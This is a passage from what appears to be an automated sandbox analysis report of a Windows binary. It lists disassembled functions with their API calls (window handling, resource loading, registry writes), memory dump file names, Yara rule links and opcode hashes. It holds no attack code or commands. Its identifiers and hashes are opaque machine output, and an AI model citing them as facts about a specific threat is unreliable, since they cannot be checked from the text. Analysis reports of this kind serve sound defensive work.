                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: e0357360efec592b395e7f24b418e361f598bc83b0700047f089e6320cff7921
                                                                                                                • Instruction ID: b2f55d23a0ff9307a8032311bef10e3584119d850ea0554f8a6eab7b755c3908
                                                                                                                • Opcode Fuzzy Hash: e0357360efec592b395e7f24b418e361f598bc83b0700047f089e6320cff7921
                                                                                                                • Instruction Fuzzy Hash: C111E931910216EBEF248F69E54A77AF7B8FF44329F104169EE0493281E73099E0D7D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126B1C1, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0126B7E0: EnterCriticalSection.KERNEL32(01389BA4,?,?,?,0126B1CF), ref: 0126B7F0
                                                                                                                • SendMessageA.USER32(?,00000000,00000000), ref: 0126B204
                                                                                                                • SendMessageA.USER32(?,00000000,00000000,?), ref: 0126B230
                                                                                                                • ValidateRect.USER32(?,00000000), ref: 0126B23F
                                                                                                                • LeaveCriticalSection.KERNEL32(01389BA4), ref: 0126B24D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalMessageSectionSend$EnterLeaveRectValidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1680301257-0
                                                                                                                • Opcode ID: 445ddec857c98db7334d7226bf1d7aefbbe5cc2408eb7efdd5c4a40212bd2248
                                                                                                                • Instruction ID: 782dea6bfdc5af4a12e0940c9545e62bf4502fbe2a197ecdd7926f6322a8bc19
                                                                                                                • Opcode Fuzzy Hash: 445ddec857c98db7334d7226bf1d7aefbbe5cc2408eb7efdd5c4a40212bd2248
                                                                                                                • Instruction Fuzzy Hash: DC11A531711212EB8F326F599C8887FFFAEEF8AA61314425DFA08C6154CB318850D7D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01266342, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,?,000000F0), ref: 01266368
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 01266374
                                                                                                                • LockResource.KERNEL32(00000000), ref: 01266381
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 012663A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: de6e755814e86ae3da518a22f38e809f3fec9477cf2db0067ac789b923a77517
                                                                                                                • Instruction ID: 610f74f32da4325f116e72b184bd045a8bd97ac2659daf20ebcd592e320b9982
                                                                                                                • Opcode Fuzzy Hash: de6e755814e86ae3da518a22f38e809f3fec9477cf2db0067ac789b923a77517
                                                                                                                • Instruction Fuzzy Hash: D111733560131AAFEB115F59DC48E6A7BADFF48625B054168FE05D7250DA31CC909A90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126506C, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 012650A7
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 012650B0
                                                                                                                • swprintf.LIBCMT ref: 012650CD
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 012650DE
                                                                                                                  • Part of subcall function 01264E12: RegCloseKey.ADVAPI32(00000000,?,?,?,?,01264C3A,?,00000000), ref: 01264E57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Close$PrivateProfileStringValueWriteswprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 581541481-0
                                                                                                                • Opcode ID: 26ecbae93c68e825f2f69ef616d28a940758dc601171f2ea923bb46390182dbf
                                                                                                                • Instruction ID: 72fa889e6ff42149a82d54412d4f6938318d184975ad7d825f57442b97321c91
                                                                                                                • Opcode Fuzzy Hash: 26ecbae93c68e825f2f69ef616d28a940758dc601171f2ea923bb46390182dbf
                                                                                                                • Instruction Fuzzy Hash: 26018872510209BBDB20EF689C45FBF77BCEF48614F54441EFA41A7180DA71DD5097A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013945, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001394C
                                                                                                                  • Part of subcall function 1008094B: _malloc.LIBCMT ref: 10080963
                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 100139CC
                                                                                                                  • Part of subcall function 1000A24D: __EH_prolog3_GS.LIBCMT ref: 1000A254
                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 1001399E
                                                                                                                • __Getcoll.LIBCPMT ref: 100139B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~__malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3081597017-0
                                                                                                                • Opcode ID: b6544858c76a8d7f3815a5b22d2652b1b86210208c794366d3ad7dd6316033b2
                                                                                                                • Instruction ID: 0e528061ad82ba249d43e11af10d28efe8fbd1238139513dc656ed6925d445da
                                                                                                                • Opcode Fuzzy Hash: b6544858c76a8d7f3815a5b22d2652b1b86210208c794366d3ad7dd6316033b2
                                                                                                                • Instruction Fuzzy Hash: BA115B75D01705DFEB50DFA4C892BCDBBB0EF08750F60802AE496AB291D7B5A984CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126385A, Relevance: 6.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,?,00000000,00000000,?,?,?,?,?,0126341B,00000000,000000FF), ref: 01263879
                                                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0126388E
                                                                                                                • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,?,00000000,?,?,?,?,?,?,0126341B,00000000,000000FF), ref: 012638A5
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 012638B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiStringWide$AllocFree
                                                                                                                • String ID:
                                                                                                                • API String ID: 447844807-0
                                                                                                                • Opcode ID: 1e28a0dd553e1ff088e30e8bebc18210a644e7cbe6bfeca7bbf76c4f18608a62
                                                                                                                • Instruction ID: 23ef3a2f4e191591e99016101341cca9a740628ce356acb7771a07d88176a3bd
                                                                                                                • Opcode Fuzzy Hash: 1e28a0dd553e1ff088e30e8bebc18210a644e7cbe6bfeca7bbf76c4f18608a62
                                                                                                                • Instruction Fuzzy Hash: 83012135611116BBEB218FA9EC8CEDBBF6CFB45764F104159FB0E96180D671998087E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262D2D, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnableMenuItem.USER32 ref: 01262D5F
                                                                                                                • GetFocus.USER32 ref: 01262D77
                                                                                                                • GetParent.USER32(?), ref: 01262D85
                                                                                                                • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 01262D9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2297321873-0
                                                                                                                • Opcode ID: dc56248260357caad9924e047137cab97b2b2ce6a367ce779cbfde33bead1aec
                                                                                                                • Instruction ID: 445ef8831bf71da969b30d47936f9ad5d1222661ec8b84b4ec835af86d62461a
                                                                                                                • Opcode Fuzzy Hash: dc56248260357caad9924e047137cab97b2b2ce6a367ce779cbfde33bead1aec
                                                                                                                • Instruction Fuzzy Hash: 20118E71120606EFDF359F28D849F66BBB9FF64325F104618E146965D0C771E8C4CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128D538, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBCMT ref: 0128D54F
                                                                                                                  • Part of subcall function 0128DB66: ___AdjustPointer.LIBCMT ref: 0128DBAF
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0128D566
                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 0128D578
                                                                                                                • CallCatchBlock.LIBCMT ref: 0128D59C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2633735394-0
                                                                                                                • Opcode ID: 41dc8b8969968bff71eb3a004b1d52bb3ceb971231e2707eb5c580e98c06f50c
                                                                                                                • Instruction ID: 2bd952562ab20a39b0468aa328c1e9e4a54ae7a37c9b5c16c37a5d7a5def571b
                                                                                                                • Opcode Fuzzy Hash: 41dc8b8969968bff71eb3a004b1d52bb3ceb971231e2707eb5c580e98c06f50c
                                                                                                                • Instruction Fuzzy Hash: 2C01293201110EBBDF12AF99DC00EEA3BBAFF58754F048015FE18621A0D336E965DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128E7FB, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction ID: e5507e81edcb5d8a33e967ed58990eda4ea6d7259dff7f7aecd62773671c9cc1
                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction Fuzzy Hash: 5201487202114ABBDF166E98DC058EE3F26BF2C354B4A8425FF28590B1C336C5B1AB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127EDCF, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(00000006), ref: 0127EDE1
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000006,00000000,00000000,00000000,00000000,00000000,?,01280B60,?,00000018,012805C6,?,?,?), ref: 0127EDF3
                                                                                                                • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0127EDFE
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000006,00000000,00000000,00000006,00000000,00000000,?,01280B60,?,00000018,012805C6,?,?,?), ref: 0127EE16
                                                                                                                  • Part of subcall function 0126828F: __CxxThrowException@8.LIBCMT ref: 012682A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Byte$CharMultiStringWide$AllocException@8Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 1067855920-0
                                                                                                                • Opcode ID: f906219dbed315f2ecac12226e4e40e92ef24cc8e7c671f3d0ccb8c1f1a4e677
                                                                                                                • Instruction ID: 986105cf1a5811e2d30bafe8d2693e103458421e0db7e2e017274d091c79124b
                                                                                                                • Opcode Fuzzy Hash: f906219dbed315f2ecac12226e4e40e92ef24cc8e7c671f3d0ccb8c1f1a4e677
                                                                                                                • Instruction Fuzzy Hash: C8F030B25105597F6B211A6AAC4CC7B7E7CDAC6BA53150469FA04C2100D6709C40C6B4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126B390, Relevance: 6.0, APIs: 4, Instructions: 47windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01270689: __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                • GetMessageTime.USER32(Function_00006D6E,?,0126BB67), ref: 0126B3A6
                                                                                                                • GetMessagePos.USER32 ref: 0126B3AF
                                                                                                                • GetDlgItem.USER32 ref: 0126B3D7
                                                                                                                • GetTopWindow.USER32(00000000), ref: 0126B3E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Message$H_prolog3ItemTimeWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1239479542-0
                                                                                                                • Opcode ID: b51762e7b0e6aed238da6240b090bc11cbd3cd45ac6b5ffc43b12f9d9bfc079f
                                                                                                                • Instruction ID: 9ef22aa80b585aa122a3a876ed697d6b27f3b1f5fa46eb8ad1b5f7ec4812b78a
                                                                                                                • Opcode Fuzzy Hash: b51762e7b0e6aed238da6240b090bc11cbd3cd45ac6b5ffc43b12f9d9bfc079f
                                                                                                                • Instruction Fuzzy Hash: 37018F31621766EBDB322F7AA8186AB7B9CEF00265B00441AFE41C2680EB30D4D0CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126D5B4, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(00000000), ref: 0126D5BB
                                                                                                                • GetTopWindow.USER32(00000000), ref: 0126D5FE
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 0126D620
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2353593579-0
                                                                                                                • Opcode ID: 09f67be237a5c98de66c9764b64f1077e6c94f7f86fcf2b4a1a03b04a165ce03
                                                                                                                • Instruction ID: 27296fa992a0ea1ed7a15d960d2a6cff8c40d52bfb49abd81bb529642e2904bb
                                                                                                                • Opcode Fuzzy Hash: 09f67be237a5c98de66c9764b64f1077e6c94f7f86fcf2b4a1a03b04a165ce03
                                                                                                                • Instruction Fuzzy Hash: BE01A53261111EABDF235FA9AC08EAE3E69FF09259F044014FA94550A1C736C6A1EF95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126B3CD, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 0126B3D7
                                                                                                                • GetTopWindow.USER32(00000000), ref: 0126B3E4
                                                                                                                  • Part of subcall function 0126B3CD: GetWindow.USER32(00000000,00000002), ref: 0126B433
                                                                                                                • GetTopWindow.USER32(?), ref: 0126B418
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 369458955-0
                                                                                                                • Opcode ID: 7854564c169b4b33a3b7141171dea3d25aa9fb1e399fff190189d6533fb04f2c
                                                                                                                • Instruction ID: 0d662a7ef84ef57092a0a3d66c7f2c37a9ffd016989fcaca25e2587f8e3a1359
                                                                                                                • Opcode Fuzzy Hash: 7854564c169b4b33a3b7141171dea3d25aa9fb1e399fff190189d6533fb04f2c
                                                                                                                • Instruction Fuzzy Hash: DD014B3132222BABCF232F69AC28AAE3A5CEF142A5F048014FE05D5091EB31C5E0D791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126B2B7, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,?,000000F0), ref: 0126B2DB
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,01267AFB,?,?,012616C2,DDD5D539), ref: 0126B2E7
                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,?,01267AFB,?,?,012616C2,DDD5D539), ref: 0126B2F4
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,01267AFB,?,?,012616C2,DDD5D539), ref: 0126B310
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: f195ab1443d84411b44bc5aacc4b9b8003286a6d4a49c1966b00998a783b25b0
                                                                                                                • Instruction ID: 18e236bdd01d829333c50f8aaf4e4ee4fd26b8d79dc432d46c73f3906f60a4aa
                                                                                                                • Opcode Fuzzy Hash: f195ab1443d84411b44bc5aacc4b9b8003286a6d4a49c1966b00998a783b25b0
                                                                                                                • Instruction Fuzzy Hash: 93F0A472B112166FA7215B5DAC8C96FBA6CEB45A65B050169FE04D3245DB308C8097E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126F779, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3TextWindow__cftof_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 721212129-0
                                                                                                                • Opcode ID: 4bbdfbc78b3daef2bc27e71a3ef099c2ecfd4236e4c1b7cdf57714c4a99284d6
                                                                                                                • Instruction ID: 3f27b3255cbf518bb4eeef65b18fb1438aeb53ef49308100747dd737264ed982
                                                                                                                • Opcode Fuzzy Hash: 4bbdfbc78b3daef2bc27e71a3ef099c2ecfd4236e4c1b7cdf57714c4a99284d6
                                                                                                                • Instruction Fuzzy Hash: F0018432520017ABCF16FBA8CC509BEB779BF64760B148119F625972D4DB319990DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126FB22, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
